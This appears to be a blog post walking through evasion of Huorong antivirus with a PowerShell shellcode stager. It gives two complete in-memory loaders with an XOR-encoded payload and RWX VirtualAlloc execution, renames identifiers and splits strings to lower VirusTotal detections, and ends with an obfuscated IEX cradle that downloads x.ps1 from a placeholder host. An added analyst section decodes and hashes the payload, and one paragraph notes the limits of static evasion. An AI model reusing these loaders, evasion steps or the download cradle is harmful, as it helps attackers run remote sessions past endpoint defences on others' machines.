PowerShell: getting a callback past Huorong AV

Payload generation

The stock payload is flagged by Huorong the instant it is generated.

Building the PowerShell evasion

Open a PowerShell console and re-encode the payload. The stager as generated carries the shellcode as a Base64 string inside FromBase64String('...'); the goal is to turn that blob into a plain comma-separated list of decimal byte values.

1. Create an empty variable $h to collect the encoded payload:

$h= ''

2. Decode the Base64 payload into a byte array and store it in $k:

$k=[System.Convert]::FromBase64String('<Base64 string from the generated stager>')

3. Loop over the bytes, appending each decimal value followed by ',' so the whole array ends up on one line:

$k | foreach {$h=$h+$_.ToString()+','}

4. Print the encoded payload:

$h

It is handier to combine the four steps into a .ps1 script:

$h= ''
$k=[System.Convert]::FromBase64String('<Base64 string from the generated stager>')
$k | foreach {$h=$h+$_.ToString()+','}
$h

Then paste the output into the stager in place of the Base64 payload, as a [Byte[]](...) literal like the one in the script below. Remember to delete the trailing comma, otherwise the array literal will not parse.

Set-StrictMode -Version 2

$DoIt = @'
function func_get_proc_address {
	Param ($var_module, $var_procedure)		
	$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
	$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
	return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

function func_get_delegate_type {
	Param (
		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
		[Parameter(Position = 1)] [Type] $var_return_type = [Void]
	)

	$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
	$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
	$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')

	return $var_type_builder.CreateType()
}

[Byte[]]$var_code = [Byte[]](223,203,170,35,35,35,67,170,198,18,241,71,168,113,19,168,113,47,168,113,55,168,81,11,44,148,105,5,18,220,18,227,143,31,66,95,33,15,3,226,236,46,34,228,193,211,113,116,168,113,51,168,97,31,34,243,168,99,91,166,227,87,105,34,243,115,168,107,59,168,123,3,34,240,192,31,106,168,23,168,34,245,18,220,18,227,143,226,236,46,34,228,27,195,86,215,32,94,219,24,94,7,86,193,123,168,123,7,34,240,69,168,47,104,168,123,63,34,240,168,39,168,34,243,170,103,7,7,120,120,66,122,121,114,220,195,123,124,121,168,49,200,165,126,75,77,70,87,35,75,84,74,77,74,119,75,111,84,5,36,220,246,18,220,116,116,116,213,87,39,170,218,200,42,75,137,230,193,126,220,246,170,226,75,102,2,125,18,220,246,18,220,116,73,36,114,117,115,75,148,116,195,40,220,246,156,35,12,35,35,26,228,87,148,18,220,202,178,34,35,35,202,234,34,35,35,203,168,220,220,220,12,98,118,80,112,35,208,4,33,14,157,27,70,88,15,73,61,184,47,138,235,121,168,75,112,158,162,204,212,255,214,74,102,24,228,214,126,49,174,152,227,236,42,203,172,124,66,80,122,144,5,235,149,92,93,192,206,242,231,244,18,147,221,229,76,18,172,50,227,153,4,192,1,194,144,7,23,166,47,35,118,80,70,81,14,98,68,70,77,87,25,3,110,76,89,74,79,79,66,12,22,13,19,3,11,64,76,78,83,66,87,74,65,79,70,24,3,110,112,106,102,3,26,13,19,24,3,116,74,77,71,76,84,80,3,109,119,3,21,13,18,24,3,116,108,116,21,23,24,3,119,81,74,71,70,77,87,12,22,13,19,10,46,41,35,37,16,92,211,233,135,151,195,150,155,157,147,223,58,32,159,110,138,235,90,117,63,228,21,123,174,137,101,74,131,107,117,133,15,243,124,38,61,87,37,179,151,239,103,41,23,87,87,46,103,247,182,166,79,128,239,239,27,189,8,81,182,35,126,229,244,140,150,87,121,79,74,24,231,20,110,170,40,63,232,81,182,252,199,208,201,190,203,123,190,93,132,31,182,45,61,74,100,61,254,205,197,111,92,77,46,77,156,218,233,140,151,47,50,49,245,10,34,127,147,232,223,11,117,203,216,70,131,162,242,118,147,200,232,50,201,11,212,68,113,38,200,118,229,229,90,205,209,149,114,123,156,105,207,251,175,107,221,76,92,251,227,251,137,33,225,45,237,6,28,177,11,111,91,244,222,52,115,69,179,148,126,98,231,26,23,169,105,117,123,94,99,124,176,120,150,149,97,76,224,9,58,87,133,193,149,15,21,231,87,253,119,156,41,209,252,1,127,35,75,211,150,129,117,220,246,73,99,75,35,51,35,35,75,35,35,99,35,116,75,123,135,112,198,220,246,176,154,35,35,35,35,34,250,114,112,170,196,116,75,35,3,35,35,112,117,75,49,181,170,193,220,246,166,227,87,229,168,36,34,224,166,227,86,198,123,224,203,138,222,220,220,18,19,23,13,17,17,22,13,18,22,16,13,17,23,27,35,49,23,117,91)

for ($x = 0; $x -lt $var_code.Count; $x++) {
	$var_code[$x] = $var_code[$x] -bxor 35
}

$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)

$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@

If ([IntPtr]::size -eq 8) {
	start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
	IEX $DoIt
}
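As an added example (not part of the original post), the PowerShell below wraps the encoding step described above in a function and adds its inverse, which is the routine an analyst applies to a stager like the one above: pull the [Byte[]](...) literal out of the script text, undo the `-bxor 35` loop, and hash the recovered shellcode so it can be matched against other samples. The function names are my own, and the sample bytes are constructed for the demo; they are not shellcode and nothing is executed.

```powershell
# Added example, not the original post's code.

# The post's encoding step as a function: Base64 blob -> comma-separated decimal list.
# -join yields no trailing comma, so there is nothing to trim by hand.
function ConvertTo-DecimalList {
    param([Parameter(Mandatory)][string]$Base64)
    $bytes = [System.Convert]::FromBase64String($Base64)
    return ($bytes -join ',')
}

# The analyst's inverse: locate the [Byte[]](...) literal in a stager's text, parse the
# decimal values, undo the stager's `-bxor` loop (key 35 in the script above) and return
# the raw bytes together with their SHA-256.
function Get-StagerShellcode {
    param(
        [Parameter(Mandatory)][string]$ScriptText,
        [byte]$XorKey = 35
    )
    # Whitespace is allowed inside the list so a literal wrapped over several lines still parses.
    $m = [regex]::Match($ScriptText, '\[Byte\[\]\]\s*\(\s*([\d\s,]+?)\s*\)')
    if (-not $m.Success) { throw 'no [Byte[]](...) literal found in script text' }

    [byte[]]$encoded = ($m.Groups[1].Value -split ',') | ForEach-Object { [byte]($_.Trim()) }
    [byte[]]$raw = foreach ($b in $encoded) { $b -bxor $XorKey }

    $sha256 = [System.Security.Cryptography.SHA256]::Create()
    $digest = ($sha256.ComputeHash($raw) | ForEach-Object { $_.ToString('x2') }) -join ''

    return [pscustomobject]@{ Bytes = $raw; Length = $raw.Length; Sha256 = $digest }
}

# Demo on constructed data: build the Base64 blob a stager would carry, run the post's
# encoding on it, drop the result into a fake stager line, then recover the original bytes.
$plain = [System.Text.Encoding]::ASCII.GetBytes('constructed sample, not shellcode')
[byte[]]$xored = foreach ($b in $plain) { $b -bxor 35 }       # what Cobalt Strike does before Base64
$b64  = [System.Convert]::ToBase64String($xored)             # the FromBase64String('...') argument
$list = ConvertTo-DecimalList -Base64 $b64                   # what the post pastes into the stager
$stub = "[Byte[]]`$var_code = [Byte[]]($list)"               # the rewritten stager line

$r = Get-StagerShellcode -ScriptText $stub
[System.Text.Encoding]::ASCII.GetString($r.Bytes)            # prints the constructed sample text again
$r.Sha256

# On a real stager: $r = Get-StagerShellcode -ScriptText (Get-Content -Raw .\x.ps1)
# then hand the bytes to a disassembler or sandbox:
# [System.IO.File]::WriteAllBytes("$PWD\shellcode.bin", $r.Bytes)
```

The regex deliberately requires `[Byte[]]` immediately followed by `(`, so the `[Byte[]]$var_code` type cast on the left-hand side is skipped and only the array literal is captured.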

Huorong: bypassed

VirusTotal still flags it, 13 of 60 engines, so it needs more work.

Rename identifiers to evade static signature matching. For lack of time only a handful were changed (note that $var_runme is listed below but the final script still uses that name):

IEX $DoIt               ->  i`ex $DoIt
IEX $a                  ->  ie`x $a
$var_runme              ->  $vrunme
$var_buffer             ->  $vbuffer
func_get_proc_address   ->  func_k
func_get_delegate_type  ->  func_l
$var_type_builder       ->  $vk
$var_parameters         ->  $vp
$var_return_type        ->  $ve
$var_procedure          ->  $v_pro

A search-and-replace tool is the easiest way to apply these consistently.

Down to 5 of 60 at this point; still needs more work.

Keep in mind what this does and does not buy. Renaming variables, splitting string literals with '+' and putting a backtick into IEX change only the static fingerprint of the file; the runtime behaviour is identical. The call chain (GetProcAddress and VirtualAlloc resolved through GetDelegateForFunctionPointer, MEM_COMMIT|MEM_RESERVE = 0x3000, PAGE_EXECUTE_READWRITE = 0x40, a 32-bit child job via -RunAs32) is untouched, and that is what behaviour-based engines, AMSI on the string handed to IEX, and PowerShell script block logging (Event ID 4104) look at. A low VirusTotal count therefore says nothing about whether the script survives on a host with those controls enabled.

Final payload

Set-StrictMode -Version 2

$DoIt = @'
function func_k {
	Param ($var_module, $v_pro)		
	$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Mic'+'rosoft.Win32.Unsa'+'feNativeMethods')
	$var_gpa = $var_unsafe_native_methods.GetMethod('GetPro'+'cAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
	return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetM'+'oduleH'+'andle')).Invoke($null, @($var_module)))), $v_pro))
}

function func_l {
	Param (
		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $vp,
		[Parameter(Position = 1)] [Type] $ve = [Void]
	)

	$vk = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('Refle'+'ctedDele'+'gate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMem'+'oryModule', $false).DefineType('MyDelega'+'teType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
	$vk.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $vp).SetImplementationFlags('Runtime, Managed')
	$vk.DefineMethod('Inv'+'oke', 'Public, HideBySig, NewSlot, Virtual', $ve, $vp).SetImplementationFlags('Runtime, Managed')

	return $vk.CreateType()
}

[Byte[]]$var_code = [Byte[]](223,203,170,35,35,35,67,170,198,18,241,71,168,113,19,168,113,47,168,113,55,168,81,11,44,148,105,5,18,220,18,227,143,31,66,95,33,15,3,226,236,46,34,228,193,211,113,116,168,113,51,168,97,31,34,243,168,99,91,166,227,87,105,34,243,115,168,107,59,168,123,3,34,240,192,31,106,168,23,168,34,245,18,220,18,227,143,226,236,46,34,228,27,195,86,215,32,94,219,24,94,7,86,193,123,168,123,7,34,240,69,168,47,104,168,123,63,34,240,168,39,168,34,243,170,103,7,7,120,120,66,122,121,114,220,195,123,124,121,168,49,200,165,126,75,77,70,87,35,75,84,74,77,74,119,75,111,84,5,36,220,246,18,220,116,116,116,116,116,75,25,117,90,132,220,246,202,167,35,35,35,120,18,234,114,114,73,32,114,114,75,115,40,35,35,112,115,75,116,170,188,229,220,246,200,83,120,18,241,113,75,35,33,99,167,113,113,113,112,113,115,75,200,118,13,24,220,246,170,229,160,224,115,18,220,116,116,73,220,112,117,75,14,37,59,88,220,246,166,227,44,167,224,34,35,35,18,220,166,213,87,39,170,218,200,42,75,137,230,193,126,220,246,170,226,75,102,2,125,18,220,246,18,220,116,73,36,114,117,115,75,148,116,195,40,220,246,156,35,12,35,35,26,228,87,148,18,220,202,178,34,35,35,202,234,34,35,35,203,168,77,71,76,84,80,3,109,119,3,21,13,18,24,3,116,108,116,21,23,24,3,119,81,74,71,70,77,87,12,22,13,19,10,46,41,35,37,16,92,211,233,135,151,195,150,155,157,147,223,58,32,159,110,138,235,90,117,63,228,21,123,174,137,101,74,131,107,117,133,15,243,124,38,61,87,37,179,151,239,103,41,23,87,87,46,103,247,182,166,79,128,239,239,27,189,8,81,182,35,126,229,244,140,150,87,121,79,74,24,231,20,110,170,40,63,232,81,182,252,199,208,201,190,203,123,190,93,132,31,182,45,61,74,100,61,254,205,197,111,92,77,46,77,156,218,233,140,151,47,50,49,245,10,34,127,147,232,223,11,117,203,216,70,131,162,242,118,147,200,232,50,201,11,212,68,113,38,200,118,229,229,90,205,209,149,114,123,156,105,207,251,175,107,221,76,92,251,227,251,137,33,225,45,237,6,28,177,11,111,91,244,222,52,115,69,179,148,126,98,231,26,23,169,105,117,123,94,99,124,176,120,150,149,97,76,224,9,58,87,133,193,149,15,21,231,87,253,119,156,41,209,252,1,127,35,75,211,150,129,117,220,246,73,99,75,35,51,35,35,75,35,35,99,35,116,75,123,135,112,198,220,246,176,154,35,35,35,35,34,250,114,112,170,196,116,75,35,3,35,35,112,117,75,49,181,170,193,220,246,166,227,87,229,168,36,34,224,166,227,86,198,123,224,203,138,222,220,220,18,19,23,13,17,17,22,13,18,22,16,13,17,23,27,35,49,23,117,91)

for ($x = 0; $x -lt $var_code.Count; $x++) {
	$var_code[$x] = $var_code[$x] -bxor 35
}

$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_k kernel32.dll VirtualAlloc), (func_l @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$vbuffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $vbuffer, $var_code.length)

$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vbuffer, (func_l @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@

If ([IntPtr]::size -eq 8) {
	start-job { param($a) ie`x $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
	i`ex $DoIt
}

Then fetch the script over HTTP from PowerShell and run it through IEX to get the session:

powershell "$a='IEX(New-Object Net.WebClient).Downlo';$b='11(''http://xxx.com/x.ps1'')'.Replace('11','adString');IEX ($a+$b)"

Or run it by hand from the directory the script was dropped in:

c:\windows\system32\xx>d:
d:\>cd D:\wwwroot\xx\xxFile
D:\wwwroot\xx\xxFile>powershell -ExecutionPolicy bypass -File ./x.ps1

This is fairly shallow and not technically deep; corrections and pointers from more experienced folks are very welcome.
